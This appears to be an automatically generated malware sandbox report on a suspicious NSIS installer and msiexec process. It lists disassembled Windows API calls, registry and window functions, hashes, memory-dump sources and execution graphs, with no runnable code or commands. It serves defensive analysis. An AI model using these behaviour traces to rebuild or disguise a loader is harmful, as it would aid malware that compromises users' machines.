                                                                                                                                                              • Instruction ID: 0e395622636dcde05068836be4baa4a456a4d64089cc24394ac90f0f0b10d43f
                                                                                                                                                              • Opcode Fuzzy Hash: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
                                                                                                                                                              • Instruction Fuzzy Hash: A511E772A01204BADB10AFB18F4EA9E32659F54354F24403BF502F61C1DAFC9A41966E
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Janushoveds Setup,NSIS Error), ref: 0040605D
                                                                                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405861,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                                                                                              • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405861,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B65
                                                                                                                                                              • GetFileAttributesW.KERNEL32(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405861,?,774D3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B75
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                              • String ID: 4Mw$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 3248276644-3850734506
                                                                                                                                                              • Opcode ID: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                                                                                              • Instruction ID: 63a6569c831ee5581447f3e1e8ec18e6ac74a78ddfb021a14ce772f4501d9fee
                                                                                                                                                              • Opcode Fuzzy Hash: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                                                                                              • Instruction Fuzzy Hash: 32F0F435100E1119D62632361C49BAF2664CF82324B4A023FF952B22D1DB3CB993CC7E
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A0A
                                                                                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A14
                                                                                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405A26
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A04
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 2659869361-2145255484
                                                                                                                                                              • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                                                                                              • Instruction ID: e6cb25dffc9e5a2bb3a1dbad45cd46e4450efeecdd43702cab0598af126a0af2
                                                                                                                                                              • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                                                                                              • Instruction Fuzzy Hash: 06D05E31211534AAC211AB589D05CDB629C9E46304341442AF241B20A1C779595186FE
                                                                                                                                                              APIs
                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                                              • lstrlenW.KERNEL32(0040B5D0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1356686001-0
                                                                                                                                                              • Opcode ID: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
                                                                                                                                                              • Instruction ID: 52a733b9c8e4ab95676b633cdda8f3d85a752b7ae8d5fcc25206d9d14f9091af
                                                                                                                                                              • Opcode Fuzzy Hash: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
                                                                                                                                                              • Instruction Fuzzy Hash: A4118E71A00108BFEB11AFA5DE89DAE777DEB44358F11403AF904B61D1DBB85E409668
                                                                                                                                                              APIs
                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00402D9D
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00402DE6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                              • Opcode ID: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                                                                                                                              • Instruction ID: 9565580f91e6c8b036764476f8379a8a9497e0cf8b36b33943f0ae23fa557cda
                                                                                                                                                              • Opcode Fuzzy Hash: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                                                                                                                              • Instruction Fuzzy Hash: FFF05E30501520BBC671AB20FF4DA9B7B64FB40B11701447AF042B15E4C7B80D828B9C
                                                                                                                                                              APIs
                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00405152
                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004051A3
                                                                                                                                                                • Part of subcall function 00404160: SendMessageW.USER32(00010476,00000000,00000000,00000000), ref: 00404172
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                              • Opcode ID: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                                                                                              • Instruction ID: 3a757cf3c9e7612e230a46be1b13aa2d047f9f757cddf2eb8b5381add8f22129
                                                                                                                                                              • Opcode Fuzzy Hash: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                                                                                              • Instruction Fuzzy Hash: 43017C71A00609ABEB218F51ED84B9B3B2AEB84750F504037F6047D1E0C77A8C929E2A
                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNEL32(?,774D3420,00000000,C:\Users\user\AppData\Local\Temp\,004037DC,004035F2,?), ref: 0040381E
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00403825
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403804
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 1100898210-2145255484
                                                                                                                                                              • Opcode ID: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                                                                                              • Instruction ID: c0ef5988400ca03a2919d730679f4c8cdc7c60ab336a91eb80d60266565c467d
                                                                                                                                                              • Opcode Fuzzy Hash: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                                                                                              • Instruction Fuzzy Hash: D2E0C2735015309BC6212F45ED0871EB7ACAF59B22F0580BAF8907B26087781C428FD8
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Kb94RzMYNf.exe,C:\Users\user\Desktop\Kb94RzMYNf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405A56
                                                                                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Kb94RzMYNf.exe,C:\Users\user\Desktop\Kb94RzMYNf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405A66
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharPrevlstrlen
                                                                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                                                                              • API String ID: 2709904686-3080008178
                                                                                                                                                              • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                                                                                              • Instruction ID: 94586c4fc4af0aa81d4ff890ae3cf2b30e5be6a9e55ec7b9bf63862dfaa4d6e2
                                                                                                                                                              • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                                                                                              • Instruction Fuzzy Hash: 0ED05EB2411920AAC312A714DD44DAF73ACEF123007464466F441A6161D7785D818AAD
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB2
                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC3
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                              • Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                                                                                              • Instruction ID: 8848f7d8d782bbf7f3224fb8fd0babd0dea9e1ab2e05ea72f699364142252924
                                                                                                                                                              • Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                                                                                              • Instruction Fuzzy Hash: 72F0C231100914EFCB029FA5CD4099FBFB8EF06350B2540A9E840F7311D674FE019BA8

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:6.6%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:4.2%
                                                                                                                                                              Total number of Nodes:72
                                                                                                                                                              Total number of Limit Nodes:8
                                                                                                                                                              execution_graph 22845 4249e0 22847 424a11 22845->22847 22848 424b11 22845->22848 22846 424a1d 22847->22846 22853 424c48 22847->22853 22856 424c58 22847->22856 22849 424a5d 22859 426360 22849->22859 22864 424c9a 22853->22864 22854 424c62 22854->22849 22857 424c62 22856->22857 22858 424c9a GetModuleHandleW 22856->22858 22857->22849 22858->22857 22860 42638b 22859->22860 22861 42643a 22860->22861 22869 427240 22860->22869 22872 42723f 22860->22872 22865 424cdc 22864->22865 22866 424cb9 22864->22866 22865->22854 22866->22865 22867 424ee0 GetModuleHandleW 22866->22867 22868 424f0d 22867->22868 22868->22854 22875 42538c 22869->22875 22873 427275 22872->22873 22874 42538c CreateWindowExW 22872->22874 22873->22861 22874->22873 22876 427290 CreateWindowExW 22875->22876 22878 4273b4 22876->22878 22878->22878 22879 ee018 22880 ee024 22879->22880 22884 2450fc62 22880->22884 22888 2450fc68 22880->22888 22881 ee61f 22885 2450fc8a 22884->22885 22887 2450fd3a 22885->22887 22892 24509548 LdrInitializeThunk 22885->22892 22887->22881 22889 2450fc8a 22888->22889 22891 2450fd3a 22889->22891 22893 24509548 LdrInitializeThunk 22889->22893 22891->22881 22892->22887 22893->22891 22894 42ba18 22895 42ba40 22894->22895 22898 42ba6c 22894->22898 22896 42ba49 22895->22896 22899 42af5c 22895->22899 22901 42af67 22899->22901 22900 42bd63 22900->22898 22901->22900 22903 42af78 22901->22903 22904 42bd98 OleInitialize 22903->22904 22905 42bdfc 22904->22905 22905->22900 22906 2450992c 22908 245097e3 22906->22908 22907 24509a69 LdrInitializeThunk 22909 24509a81 22907->22909 22908->22907 22910 bd044 22911 bd05c 22910->22911 22912 bd0b6 22911->22912 22917 4252d7 22911->22917 22921 425398 22911->22921 22925 425338 22911->22925 22929 4253b4 22911->22929 22918 42533c 22917->22918 22920 4252de 22917->22920 22918->22920 22933 4254dc 22918->22933 22920->22912 22922 42539d 22921->22922 22923 4254dc CallWindowProcW 22922->22923 22924 425399 22922->22924 22923->22924 22924->22912 22926 42533d 22925->22926 22927 4254dc CallWindowProcW 22926->22927 22928 4252fd 22926->22928 22927->22928 22928->22912 22930 4253bf 22929->22930 22931 4254dc CallWindowProcW 22930->22931 22932 4281f9 22930->22932 22931->22932 22934 4254e7 22933->22934 22935 4298ea CallWindowProcW 22934->22935 22936 429899 22934->22936 22935->22936 22936->22920

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 e5321-e5334 1 e5336-e5338 0->1 2 e5394-e53a0 0->2 1->2 3 e53a7-e5484 call e41a0 call e3cc0 2->3 4 e53a2 2->4 14 e548b-e54a9 3->14 15 e5486 3->15 4->3 46 e54ac call e5658 14->46 47 e54ac call e5649 14->47 15->14 16 e54b2-e54bd 17 e54bf 16->17 18 e54c4-e54c8 16->18 17->18 19 e54cd-e54d4 18->19 20 e54ca-e54cb 18->20 22 e54db-e54e9 19->22 23 e54d6 19->23 21 e54ec-e5530 20->21 27 e5596-e55ad 21->27 22->21 23->22 29 e55af-e55d4 27->29 30 e5532-e5548 27->30 36 e55ec 29->36 37 e55d6-e55eb 29->37 33 e554a-e5556 30->33 34 e5572 30->34 38 e5558-e555e 33->38 39 e5560-e5566 33->39 40 e5578-e5595 34->40 43 e55ed 36->43 37->36 41 e5570 38->41 39->41 40->27 41->40 43->43 46->16 47->16
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 0o6p$Lj6p$Lj6p
                                                                                                                                                              • API String ID: 0-3500687762
                                                                                                                                                              • Opcode ID: 1e07b61a3eab1d7a72f3c328d15eb0e64e48bcc9b131198343effc8bd6f61e3b
                                                                                                                                                              • Instruction ID: c1fd22df7886d3e3c4f601c9bf9a3a2d7c06dd5301da32cf6124194037dfe5de
                                                                                                                                                              • Opcode Fuzzy Hash: 1e07b61a3eab1d7a72f3c328d15eb0e64e48bcc9b131198343effc8bd6f61e3b
                                                                                                                                                              • Instruction Fuzzy Hash: 4D81B474E00658CFDB54CFAAC884A9DBBF2BF88305F148469E819BB365DB749941CF50

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
